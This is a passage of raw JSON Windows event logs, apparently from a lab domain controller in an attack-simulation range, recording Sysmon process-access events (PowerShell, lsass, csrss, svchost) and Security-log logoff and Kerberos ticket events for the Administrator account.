05:52:18.733","SourceProcessGUID":"{A837DB8D-0312-5F25-0000-001064C40600}","SourceProcessId":"4920","SourceThreadId":"4332","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-001023D00600}","TargetProcessId":"1064","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98992f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e281d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e342fc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e1ab57(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e1a127(wow64)","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4546,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.733\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.733","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4547,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.733\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.733","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4548,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.733\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-001023D00600}\r\nTargetProcessId: 1064\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.733","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-001023D00600}","TargetProcessId":"1064","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4549,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.733\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.733","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4550,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.733\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.733","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220489,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x657C6\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x657c6","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220490,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x66E06\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x66e06","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220491,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6736B\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6736b","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220492,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220493,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
